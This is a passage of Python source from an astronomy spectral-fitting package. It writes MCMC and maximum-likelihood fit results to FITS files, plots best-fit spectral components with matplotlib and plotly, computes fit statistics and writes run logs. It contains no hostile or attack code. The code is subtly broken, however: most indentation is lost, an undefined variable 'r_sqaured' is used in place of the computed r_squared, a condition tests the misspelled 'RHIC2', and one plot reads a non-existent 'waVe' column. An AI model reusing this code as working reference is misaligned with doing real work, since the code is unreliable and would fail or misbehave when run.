fits.Column(name='spaxely', array=spaxely, format='E')
]))
hdu.append(hdu2)
hdu.writeto(run_dir.joinpath('log', 'par_table.fits'), overwrite=True)
del hdu
# Write full param dict to log file
write_log((par_names,par_best,ci_68_low,ci_68_upp,ci_95_low,ci_95_upp,mean,std_dev,median,med_abs_dev,flags),'emcee_results',run_dir)
return
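# Minimal usage sketch (not called by BADASS) showing how the par_table.fits
# written above can be read back with astropy; the helper name and the returned
# structure are assumptions for illustration.
def _read_par_table_example(run_dir):
	"""Sketch: return a {parameter: best_fit} dictionary from log/par_table.fits."""
	with fits.open(run_dir.joinpath('log', 'par_table.fits')) as hdu:
		tbdata = hdu[1].data # best-fit parameter table is stored on extension 1
		return {str(name): float(best) for name, best in zip(tbdata['parameter'], tbdata['best_fit'])}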
def write_chains(param_dict,run_dir):
"""
	Writes all MCMC chains to a single FITS binary table; each column
	stores the full (nwalkers, niter) chain for one free parameter.
"""
# for key in param_dict:
# print(key,np.shape(param_dict[key]["chain"]))
cols = []
# Construct a column for each parameter and chain
for key in param_dict:
# cols.append(fits.Column(name=key, format='D',array=param_dict[key]['chain']))
values = param_dict[key]['chain']
cols.append(fits.Column(name=key, format="%dD" % (values.shape[0]*values.shape[1]), dim="(%d,%d)" % (values.shape[1],values.shape[0]), array=[values]))
# Write to fits
cols = fits.ColDefs(cols)
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(run_dir.joinpath('log', 'MCMC_chains.fits'), overwrite=True)
return
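# Minimal usage sketch (not called by BADASS) showing how the chains written
# above can be recovered: each column of MCMC_chains.fits holds a single row
# whose cell is the full chain for that parameter, written with shape
# (nwalkers, niter).  The helper name is an assumption for illustration.
def _read_chains_example(run_dir):
	"""Sketch: return {parameter: chain array of shape (nwalkers, niter)}."""
	with fits.open(run_dir.joinpath('log', 'MCMC_chains.fits')) as hdu:
		tbdata = hdu[1].data
		return {name: np.array(tbdata[name][0]) for name in tbdata.columns.names}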
def plot_best_model(param_dict,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
fit_stat,
velscale,
run_dir):
"""
	Plots the best-fit model and outputs the components to a FITS file for reproduction.
"""
param_names = [key for key in param_dict ]
par_best = [param_dict[key]['par_best'] for key in param_dict ]
def poly_label(kind):
if kind=="ppoly":
order = len([p for p in param_names if p.startswith("PPOLY_") ])-1
if kind=="apoly":
order = len([p for p in param_names if p.startswith("APOLY_")])-1
if kind=="mpoly":
order = len([p for p in param_names if p.startswith("MPOLY_")])-1
#
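		# The slice below picks an ordinal suffix out of "tsnrhtdd" (read in steps of
		# four: "th", "st", "nd", "rd"); the index is n%10 for numbers ending in 1-3
		# outside the teens and 0 otherwise, e.g. 1 -> "1st", 2 -> "2nd", 11 -> "11th".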
ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(n//10%10!=1)*(n%10<4)*n%10::4])
return ordinal(order)
def calc_new_center(center,voff):
"""
		Calculates the new line center shifted
		by a velocity offset (in km/s).
"""
c = 299792.458 # speed of light (km/s)
new_center = (voff*center)/c + center
return new_center
output_model = True
fit_type = 'final'
comp_dict = fit_model(par_best,
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
# Put params in dictionary
p = dict(zip(param_names,par_best))
# Maximum Likelihood plot
fig = plt.figure(figsize=(14,6))
gs = gridspec.GridSpec(4, 1)
gs.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
ax1 = plt.subplot(gs[0:3,0])
ax2 = plt.subplot(gs[3,0])
for key in comp_dict:
if (key=='DATA'):
ax1.plot(comp_dict['WAVE'],comp_dict['DATA'],linewidth=0.5,color='white',label='Data',zorder=0)
elif (key=='MODEL'):
ax1.plot(lam_gal,comp_dict[key], color='xkcd:bright red', linewidth=1.0, label='Model', zorder=15)
elif (key=='HOST_GALAXY'):
ax1.plot(comp_dict['WAVE'], comp_dict['HOST_GALAXY'], color='xkcd:bright green', linewidth=0.5, linestyle='-', label='Host/Stellar')
elif (key=='POWER'):
ax1.plot(comp_dict['WAVE'], comp_dict['POWER'], color='xkcd:red' , linewidth=0.5, linestyle='--', label='AGN Cont.')
elif (key=='PPOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['PPOLY'], color='xkcd:magenta' , linewidth=0.5, linestyle='-', label='%s-order Poly.' % (poly_label("ppoly")))
elif (key=='APOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['APOLY'], color='xkcd:bright purple' , linewidth=0.5, linestyle='-', label='%s-order Add. Poly.' % (poly_label("apoly")))
elif (key=='MPOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['MPOLY'], color='xkcd:lavender' , linewidth=0.5, linestyle='-', label='%s-order Mult. Poly.' % (poly_label("mpoly")))
elif (key in ['NA_OPT_FEII_TEMPLATE','BR_OPT_FEII_TEMPLATE']):
ax1.plot(comp_dict['WAVE'], comp_dict['NA_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='Narrow FeII')
ax1.plot(comp_dict['WAVE'], comp_dict['BR_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='Broad FeII')
elif (key in ['F_OPT_FEII_TEMPLATE','S_OPT_FEII_TEMPLATE','G_OPT_FEII_TEMPLATE','Z_OPT_FEII_TEMPLATE']):
if key=='F_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['F_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='F-transition FeII')
elif key=='S_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['S_OPT_FEII_TEMPLATE'], color='xkcd:mustard', linewidth=0.5, linestyle='-' , label='S-transition FeII')
elif key=='G_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['G_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='G-transition FeII')
elif key=='Z_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['Z_OPT_FEII_TEMPLATE'], color='xkcd:rust', linewidth=0.5, linestyle='-' , label='Z-transition FeII')
elif (key=='UV_IRON_TEMPLATE'):
ax1.plot(comp_dict['WAVE'], comp_dict['UV_IRON_TEMPLATE'], color='xkcd:bright purple', linewidth=0.5, linestyle='-' , label='UV Iron' )
elif (key=='BALMER_CONT'):
ax1.plot(comp_dict['WAVE'], comp_dict['BALMER_CONT'], color='xkcd:bright green', linewidth=0.5, linestyle='--' , label='Balmer Continuum' )
# Plot emission lines by cross-referencing comp_dict with line_list
if (key in line_list):
if (line_list[key]["line_type"]=="na"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:cerulean', linewidth=0.5, linestyle='-', label='Narrow/Core Comp.')
if (line_list[key]["line_type"]=="br"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:bright teal', linewidth=0.5, linestyle='-', label='Broad Comp.')
if (line_list[key]["line_type"]=="out"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:bright pink', linewidth=0.5, linestyle='-', label='Outflow Comp.')
if (line_list[key]["line_type"]=="abs"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:pastel red', linewidth=0.5, linestyle='-', label='Absorption Comp.')
if (line_list[key]["line_type"]=="user"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:electric lime', linewidth=0.5, linestyle='-', label='Other')
# Plot bad pixels
ibad = [i for i in range(len(lam_gal)) if i not in fit_mask]
if (len(ibad)>0):# and (len(ibad[0])>1):
bad_wave = [(lam_gal[m],lam_gal[m+1]) for m in ibad if ((m+1)<len(lam_gal))]
		ax1.axvspan(bad_wave[0][0],bad_wave[0][1],alpha=0.25,color='xkcd:lime green',label="bad pixels")
		for i in bad_wave[1:]:
			ax1.axvspan(i[0],i[1],alpha=0.25,color='xkcd:lime green')
ax1.set_xticklabels([])
ax1.set_xlim(np.min(lam_gal)-10,np.max(lam_gal)+10)
# ax1.set_ylim(-0.5*np.median(comp_dict['MODEL']),np.max([comp_dict['DATA'],comp_dict['MODEL']]))
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=10)
# Residuals
sigma_resid = np.nanstd(comp_dict['DATA'][fit_mask]-comp_dict['MODEL'][fit_mask])
sigma_noise = np.median(comp_dict['NOISE'][fit_mask])
	ax2.plot(lam_gal,(comp_dict['NOISE']*3.0),linewidth=0.5,color="xkcd:bright orange",label=r'$\sigma_{\mathrm{noise}}=%0.4f$' % (sigma_noise))
	ax2.plot(lam_gal,(comp_dict['RESID']*3.0),linewidth=0.5,color="white",label=r'$\sigma_{\mathrm{resid}}=%0.4f$' % (sigma_resid))
ax1.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
ax2.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
# Axes limits
ax_low = np.min([ax1.get_ylim()[0],ax2.get_ylim()[0]])
ax_upp = np.nanmax(comp_dict['DATA'][fit_mask])+(3.0 * np.nanmedian(comp_dict['NOISE'][fit_mask])) # np.max([ax1.get_ylim()[1], ax2.get_ylim()[1]])
# if np.isfinite(sigma_resid):
# ax_upp += 3.0 * sigma_resid
	minimum = [np.nanmin(comp_dict[comp][np.where(np.isfinite(comp_dict[comp]))[0]]) for comp in comp_dict
			   if comp_dict[comp][np.isfinite(comp_dict[comp])].size > 0]
if len(minimum) > 0:
minimum = np.nanmin(minimum)
else:
minimum = 0.0
ax1.set_ylim(np.nanmin([0.0, minimum]), ax_upp)
ax1.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax2.set_ylim(ax_low,ax_upp)
ax2.set_xlim(np.min(lam_gal),np.max(lam_gal))
# Axes labels
ax2.set_yticklabels(np.round(np.array(ax2.get_yticks()/3.0)))
ax2.set_ylabel(r'$\Delta f_\lambda$',fontsize=12)
ax2.set_xlabel(r'Wavelength, $\lambda\;(\mathrm{\AA})$',fontsize=12)
handles, labels = ax1.get_legend_handles_labels()
by_label = dict(zip(labels, handles))
ax1.legend(by_label.values(), by_label.keys(),loc='upper right',fontsize=8)
ax2.legend(loc='upper right',fontsize=8)
# Emission line annotations
# Gather up emission line center wavelengths and labels (if available, removing any duplicates)
line_labels = []
for line in line_list:
if "label" in line_list[line]:
line_labels.append([line,line_list[line]["label"]])
line_labels = set(map(tuple, line_labels))
for label in line_labels:
center = line_list[label[0]]["center"]
if (line_list[label[0]]["voff"]=="free"):
voff = p[label[0]+"_VOFF"]
elif (line_list[label[0]]["voff"]!="free"):
voff = ne.evaluate(line_list[label[0]]["voff"],local_dict = p).item()
xloc = calc_new_center(center,voff)
yloc = np.max([comp_dict["DATA"][find_nearest(lam_gal,xloc)[1]],comp_dict["MODEL"][find_nearest(lam_gal,xloc)[1]]])
ax1.annotate(label[1], xy=(xloc, yloc), xycoords='data',
xytext=(xloc, yloc), textcoords='data',
horizontalalignment='center', verticalalignment='bottom',
color='xkcd:white',fontsize=6,
)
# Save figure
plt.savefig(run_dir.joinpath('best_fit_model.pdf'))
# Close plot
fig.clear()
plt.close()
# Store best-fit components in a FITS file
# Construct a column for each parameter and chain
cols = []
for key in comp_dict:
cols.append(fits.Column(name=key, format='E', array=comp_dict[key]))
# Add fit mask to cols
cols.append(fits.Column(name="MASK", format='E', array=fit_mask))
# Write to fits
cols = fits.ColDefs(cols)
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(run_dir.joinpath('log', 'best_model_components.fits'), overwrite=True)
return comp_dict
def fit_quality_pars(param_dict,line_list,combined_line_list,comp_dict,fit_mask,fit_type,fit_stat):
fit_quality_dict = {}
if fit_stat=="RCHI2":
if fit_type=="max_like":
noise = comp_dict["NOISE"]*param_dict["NOISE_SCALE"]["med"]
elif fit_type=="mcmc":
noise = comp_dict["NOISE"]*param_dict["NOISE_SCALE"]["par_best"]
elif fit_stat!="RHIC2":
noise = comp_dict["NOISE"]
# compute NPIX for each line in the line list
for l in line_list:
npix = len(np.where(comp_dict[l]>noise)[0])
if fit_type=="max_like":
fit_quality_dict[l+"_NPIX"] = {"med":npix,"std":0,"flag":0}
elif fit_type=="mcmc":
fit_quality_dict[l+"_NPIX"] = {"par_best":npix,
"ci_68_low":0,"ci_68_upp":0,
"ci_95_low":0,"ci_95_upp":0,
"mean":0,"std_dev":0,
"median":0,"med_abs_dev":0,
"flag":0
}
# compute NPIX for any combined lines
if len(combined_line_list)>0:
for c in combined_line_list:
comb_line = np.zeros(len(noise))
for l in combined_line_list[c]["lines"]:
comb_line+=comp_dict[l]
npix = len(np.where(comb_line>noise)[0])
if fit_type=="max_like":
fit_quality_dict[c+"_NPIX"] = {"med":npix,"std":0,"flag":0}
elif fit_type=="mcmc":
fit_quality_dict[c+"_NPIX"] = {"par_best":npix,
"ci_68_low":0,"ci_68_upp":0,
"ci_95_low":0,"ci_95_upp":0,
"mean":0,"std_dev":0,
"median":0,"med_abs_dev":0,
"flag":0
}
# compute a total chi-squared and r-squared
	r_squared = 1-(np.sum((comp_dict["DATA"][fit_mask]-comp_dict["MODEL"][fit_mask])**2/np.sum(comp_dict["DATA"][fit_mask]**2)))
nu = len(comp_dict["DATA"])-len(param_dict)
rchi_squared = (np.sum((comp_dict["DATA"][fit_mask]-comp_dict["MODEL"][fit_mask])**2/(noise[fit_mask])**2,axis=0))/nu
if fit_type=="max_like":
fit_quality_dict["R_SQUARED"] = {"med":r_sqaured,"std":0,"flag":0}
fit_quality_dict["RCHI_SQUARED"] = {"med":rchi_squared,"std":0,"flag":0}
elif fit_type=="mcmc":
fit_quality_dict["R_SQUARED"] = {"par_best":r_sqaured,
"ci_68_low":0,"ci_68_upp":0,
"ci_95_low":0,"ci_95_upp":0,
"mean":0,"std_dev":0,
"median":0,"med_abs_dev":0,
"flag":0
}
fit_quality_dict["RCHI_SQUARED"] = {"par_best":rchi_squared,
"ci_68_low":0,"ci_68_upp":0,
"ci_95_low":0,"ci_95_upp":0,
"mean":0,"std_dev":0,
"median":0,"med_abs_dev":0,
"flag":0
}
return fit_quality_dict
def write_max_like_results(result_dict,comp_dict,header_dict,fit_mask,run_dir,
binnum=None,spaxelx=None,spaxely=None):
"""
Write maximum likelihood fit results to FITS table
if MCMC is not performed.
"""
# for key in result_dict:
# print(key, result_dict[key])
# Extract elements from dictionaries
par_names = []
par_best = []
sig = []
for key in result_dict:
par_names.append(key)
par_best.append(result_dict[key]['med'])
if "std" in result_dict[key]:
sig.append(result_dict[key]['std'])
# Sort the fit results
i_sort = np.argsort(par_names)
par_names = np.array(par_names)[i_sort]
par_best = np.array(par_best)[i_sort]
sig = np.array(sig)[i_sort]
# Write best-fit parameters to FITS table
col1 = fits.Column(name='parameter', format='30A', array=par_names)
col2 = fits.Column(name='best_fit' , format='E' , array=par_best)
if "std" in result_dict[par_names[0]]:
col3 = fits.Column(name='sigma' , format='E' , array=sig)
if "std" in result_dict[par_names[0]]:
cols = fits.ColDefs([col1,col2,col3])
else:
cols = fits.ColDefs([col1,col2])
table_hdu = fits.BinTableHDU.from_columns(cols)
# Header information
hdr = fits.Header()
if binnum is not None:
header_dict['binnum'] = binnum
for key in header_dict:
hdr[key] = header_dict[key]
empty_primary = fits.PrimaryHDU(header=hdr)
hdu = fits.HDUList([empty_primary, table_hdu])
if spaxelx is not None and spaxely is not None:
hdu2 = fits.BinTableHDU.from_columns(fits.ColDefs([
fits.Column(name='spaxelx', array=spaxelx, format='E'),
fits.Column(name='spaxely', array=spaxely, format='E')
]))
hdu.append(hdu2)
hdu.writeto(run_dir.joinpath('log', 'par_table.fits'), overwrite=True)
del hdu
# Write best-fit components to FITS file
cols = []
# Construct a column for each parameter and chain
for key in comp_dict:
cols.append(fits.Column(name=key, format='E', array=comp_dict[key]))
# Add fit mask to cols
mask = np.zeros(len(comp_dict["WAVE"]),dtype=bool)
mask[fit_mask] = True
cols.append(fits.Column(name="MASK", format='E', array=mask))
# Write to fits
cols = fits.ColDefs(cols)
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(run_dir.joinpath('log', 'best_model_components.fits'), overwrite=True)
#
return
def plotly_best_fit(objname,line_list,fit_mask,run_dir):
"""
Generates an interactive HTML plot of the best fit model
using plotly.
"""
import plotly.graph_objects as go
from plotly.subplots import make_subplots
# Open the best_fit_components file
hdu = fits.open(run_dir.joinpath("log", "best_model_components.fits") )
tbdata = hdu[1].data # FITS table data is stored on FITS extension 1
cols = [i.name for i in tbdata.columns]
hdu.close()
# Create a figure with subplots
fig = make_subplots(rows=2, cols=1, row_heights=(3,1) )
# tracenames = []
# Plot
for comp in cols:
if comp=="DATA":
tracename = "Data"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["DATA"] , mode="lines", line=go.scatter.Line(color="white", width=1), name=tracename, legendrank=1, showlegend=True), row=1, col=1)
if comp=="MODEL":
tracename="Model"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["MODEL"], mode="lines", line=go.scatter.Line(color="red" , width=1), name=tracename, legendrank=2, showlegend=True), row=1, col=1)
if comp=="NOISE":
tracename="Noise"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["NOISE"], mode="lines", line=go.scatter.Line(color="#FE00CE" , width=1), name=tracename, legendrank=3, showlegend=True), row=1, col=1)
# Continuum components
if comp=="HOST_GALAXY":
tracename="Host Galaxy"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["HOST_GALAXY"], mode="lines", line=go.scatter.Line(color="lime", width=1), name=tracename, legendrank=4, showlegend=True), row=1, col=1)
if comp=="POWER":
tracename="Power-law"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["POWER"], mode="lines", line=go.scatter.Line(color="red", width=1, dash="dash"), name=tracename, legendrank=5, showlegend=True), row=1, col=1)
if comp=="BALMER_CONT":
tracename="Balmer cont."
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["BALMER_CONT"], mode="lines", line=go.scatter.Line(color="lime", width=1, dash="dash"), name=tracename, legendrank=6, showlegend=True), row=1, col=1)
# FeII components
if comp=="UV_IRON_TEMPLATE":
tracename="UV Iron"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["UV_IRON_TEMPLATE"], mode="lines", line=go.scatter.Line(color="#AB63FA", width=1), name=tracename, legendrank=7, showlegend=True), row=1, col=1)
if comp=="NA_OPT_FEII_TEMPLATE":
tracename="Narrow FeII"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["NA_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="rgb(255,255,51)", width=1), name=tracename, legendrank=7, showlegend=True), row=1, col=1)
if comp=="BR_OPT_FEII_TEMPLATE":
tracename="Broad FeII"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["BR_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="#FF7F0E", width=1), name=tracename, legendrank=8, showlegend=True), row=1, col=1)
if comp=='F_OPT_FEII_TEMPLATE':
tracename="F-transition FeII"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["F_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="rgb(255,255,51)", width=1), name=tracename, legendrank=7, showlegend=True), row=1, col=1)
if comp=='S_OPT_FEII_TEMPLATE':
tracename="S-transition FeII"
fig.add_trace(go.Scatter( x = tbdata["waVe"], y = tbdata["S_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="rgb(230,171,2)", width=1), name=tracename, legendrank=8, showlegend=True), row=1, col=1)
if comp=='G_OPT_FEII_TEMPLATE':
tracename="G-transition FeII"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["G_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="#FF7F0E", width=1), name=tracename, legendrank=9, showlegend=True), row=1, col=1)
if comp=='Z_OPT_FEII_TEMPLATE':
tracename="Z-transition FeII"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["Z_OPT_FEII_TEMPLATE"], mode="lines", line=go.scatter.Line(color="rgb(217,95,2)", width=1), name=tracename, legendrank=10, showlegend=True), row=1, col=1)
# Line components
if comp in line_list:
if line_list[comp]["line_type"]=="na":
# tracename="narrow line"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata[comp], mode="lines", line=go.scatter.Line(color="#00B5F7", width=1), name=comp, legendgroup="narrow lines",legendgrouptitle_text="narrow lines", legendrank=11,), row=1, col=1)
# tracenames.append(tracename)
if line_list[comp]["line_type"]=="br":
# tracename="broad line"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata[comp], mode="lines", line=go.scatter.Line(color="#22FFA7", width=1), name=comp, legendgroup="broad lines",legendgrouptitle_text="broad lines", legendrank=13,), row=1, col=1)
# tracenames.append(tracename)
if line_list[comp]["line_type"]=="out":
# tracename="outflow line"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata[comp], mode="lines", line=go.scatter.Line(color="#FC0080", width=1), name=comp, legendgroup="outflow lines",legendgrouptitle_text="outflow lines", legendrank=14,), row=1, col=1)
# tracenames.append(tracename)
if line_list[comp]["line_type"]=="abs":
# tracename="absorption line"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata[comp], mode="lines", line=go.scatter.Line(color="#DA16FF", width=1), name=comp, legendgroup="absorption lines",legendgrouptitle_text="absorption lines", legendrank=15,), row=1, col=1)
# tracenames.append(tracename)
if line_list[comp]["line_type"]=="user":
# tracename="absorption line"
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata[comp], mode="lines", line=go.scatter.Line(color="rgb(153,201,59)", width=1), name=comp, legendgroup="user lines",legendgrouptitle_text="user lines", legendrank=16,), row=1, col=1)
# tracenames.append(tracename)
fig.add_hline(y=0.0, line=dict(color="gray", width=2), row=1, col=1)
# Plot bad pixels
# lam_gal = tbdata["WAVE"]
# ibad = [i for i in range(len(lam_gal)) if i not in fit_mask]
# if (len(ibad)>0):# and (len(ibad[0])>1):
# bad_wave = [(lam_gal[m],lam_gal[m+1]) for m in ibad if ((m+1)<len(lam_gal))]
# # ax1.axvspan(bad_wave[0][0],bad_wave[0][0],alpha=0.25,color='xkcd:lime green',label="bad pixels")
# fig.add_vrect(
# x0=bad_wave[0][0], x1=bad_wave[0][0],
# fillcolor="rgb(179,222,105)", opacity=0.25,
# layer="below", line_width=0,name="bad pixels",
# ),
# for i in bad_wave[1:]:
# # ax1.axvspan(i[0],i[0],alpha=0.25,color='xkcd:lime green')
# fig.add_vrect(
# x0=i[0], x1=i[1],
# fillcolor="rgb(179,222,105)", opacity=0.25,
# layer="below", line_width=0,name="bad pixels",
# ),
# Residuals
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["RESID"], mode="lines", line=go.scatter.Line(color="white" , width=1), name="Residuals", showlegend=False), row=2, col=1)
fig.add_trace(go.Scatter( x = tbdata["WAVE"], y = tbdata["NOISE"], mode="lines", line=go.scatter.Line(color="#FE00CE" , width=1), name="Noise", showlegend=False, legendrank=3,), row=2, col=1)
# Figure layout, size, margins
fig.update_layout(
autosize=False,
width=1700,
height=800,
margin=dict(
l=100,
r=100,
b=100,
t=100,
pad=1
),
title= objname,
font_family="Times New Roman",
font_size=16,
font_color="white",
legend_title_text="Components",
legend_bgcolor="black",
paper_bgcolor="black",
plot_bgcolor="black",
)
# Update x-axis properties
fig.update_xaxes(title=r"$\Large\lambda_{\rm{rest}}\;\left[Å\right]$", linewidth=0.5, linecolor="gray", mirror=True,
gridwidth=1, gridcolor="#222A2A", zerolinewidth=2, zerolinecolor="#222A2A",
row=1, col=1)
fig.update_xaxes(title=r"$\Large\lambda_{\rm{rest}}\;\left[Å\right]$", linewidth=0.5, linecolor="gray", mirror=True,
gridwidth=1, gridcolor="#222A2A", zerolinewidth=2, zerolinecolor="#222A2A",
row=2, col=1)
# Update y-axis properties
fig.update_yaxes(title=r"$\Large f_\lambda\;\left[\rm{erg}\;\rm{cm}^{-2}\;\rm{s}^{-1}\;Å^{-1}\right]$", linewidth=0.5, linecolor="gray", mirror=True,
gridwidth=1, gridcolor="#222A2A", zerolinewidth=2, zerolinecolor="#222A2A",
row=1, col=1)
fig.update_yaxes(title=r"$\Large\Delta f_\lambda$", linewidth=0.5, linecolor="gray", mirror=True,
gridwidth=1, gridcolor="#222A2A", zerolinewidth=2, zerolinecolor="#222A2A",
row=2, col=1)
fig.update_xaxes(matches='x')
# fig.update_yaxes(matches='y')
# fig.show()
# Write to HTML
fig.write_html(run_dir.joinpath("%s_bestfit.html" % objname),include_mathjax="cdn")
# Write to PDF
# fig.write_image(run_dir.joinpath("%s_bestfit.pdf" % objname))
return
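# Usage sketch (illustrative; the object name and line list below are hypothetical):
# after a fit has written log/best_model_components.fits to run_dir, a plot can
# be generated with, e.g.,
#   line_list = {"NA_OIII_5007": {"line_type": "na"}, "BR_H_BETA": {"line_type": "br"}}
#   plotly_best_fit("my_object", line_list, fit_mask=np.arange(4000), run_dir=run_dir)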
# Clean-up Routine
##################################################################################
def cleanup(run_dir):
"""
Cleans up the run directory.
"""
# Remove param_plots folder if empty
histo_dir = run_dir.joinpath('histogram_plots')
if histo_dir.is_dir() and not any(histo_dir.iterdir()):
histo_dir.rmdir()
# If run_dir is empty because there aren't enough good pixels, remove it
if run_dir.is_dir() and not any(run_dir.iterdir()):
run_dir.rmdir()
return None
##################################################################################
def write_log(output_val,output_type,run_dir):
"""
This function writes values to a log file as the code runs.
"""
log_file_path = run_dir.joinpath('log', 'log_file.txt')
log_file_path.parent.mkdir(parents=True, exist_ok=True)
if not log_file_path.is_file():
with log_file_path.open(mode='w') as logfile:
logfile.write('\n############################### BADASS v9.1.1 LOGFILE ####################################\n')
# sdss_prepare
# output_val=(file,ra,dec,z,fit_min,fit_max,velscale,ebv), output_type=0
if (output_type=='prepare_sdss_spec'):
fits_file,ra,dec,z,cosmology,fit_min,fit_max,velscale,ebv = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}'.format('file:' , fits_file.name ))
logfile.write('\n{0:<30}{1:<30}'.format('(RA, DEC):' , '(%0.6f,%0.6f)' % (ra,dec) ))
logfile.write('\n{0:<30}{1:<30}'.format('SDSS redshift:' , '%0.5f' % z ))
logfile.write('\n{0:<30}{1:<30}'.format('fitting region:' , '(%d,%d) [A]' % (fit_min,fit_max) ))
logfile.write('\n{0:<30}{1:<30}'.format('velocity scale:' , '%0.2f [km/s/pixel]' % velscale))
logfile.write('\n{0:<30}{1:<30}'.format('Galactic E(B-V):', '%0.3f' % ebv))
logfile.write('\n')
logfile.write('\n{0:<30}'.format('Units:'))
logfile.write('\n{0:<30}'.format(' - Note: SDSS Spectra are in units of [1.e-17 erg/s/cm2/Å]'))
logfile.write('\n{0:<30}'.format(' - Velocity, dispersion, and FWHM have units of [km/s]'))
logfile.write('\n{0:<30}'.format(' - Fluxes and Luminosities are in log-10'))
logfile.write('\n')
logfile.write('\n{0:<30}'.format('Cosmology:'))
logfile.write('\n{0:<30}'.format(' H0 = %0.1f' % cosmology["H0"]))
logfile.write('\n{0:<30}'.format(' Om0 = %0.2f' % cosmology["Om0"]))
logfile.write('\n')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='prepare_user_spec'):
fits_file,z,cosmology,fit_min,fit_max,velscale,ebv = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}'.format('file:' , fits_file.name ))
# logfile.write('\n{0:<30}{1:<30}'.format('(RA, DEC):' , '(%0.6f,%0.6f)' % (ra,dec) ))
logfile.write('\n{0:<30}{1:<30}'.format('redshift:' , '%0.5f' % z ))
logfile.write('\n{0:<30}{1:<30}'.format('fitting region:' , '(%d,%d) [A]' % (fit_min,fit_max) ))
logfile.write('\n{0:<30}{1:<30}'.format('velocity scale:' , '%0.2f [km/s/pixel]' % velscale))
logfile.write('\n{0:<30}{1:<30}'.format('Galactic E(B-V):', '%0.3f' % ebv))
logfile.write('\n')
logfile.write('\n{0:<30}'.format('Units:'))
logfile.write('\n{0:<30}'.format(' - Note: SDSS Spectra are in units of [1.e-17 erg/s/cm2/Å]'))
logfile.write('\n{0:<30}'.format(' - Velocity, dispersion, and FWHM have units of [km/s]'))
logfile.write('\n{0:<30}'.format(' - Fluxes and Luminosities are in log-10'))
logfile.write('\n')
logfile.write('\n{0:<30}'.format('Cosmology:'))
logfile.write('\n{0:<30}'.format(' H0 = %0.1f' % cosmology["H0"]))
logfile.write('\n{0:<30}'.format(' Om0 = %0.2f' % cosmology["Om0"]))
logfile.write('\n')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='fit_information'):
fit_options,mcmc_options,comp_options,losvd_options,host_options,power_options,poly_options,opt_feii_options,uv_iron_options,balmer_options,\
plot_options,output_options = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### User-Input Fitting Parameters & Options ###')
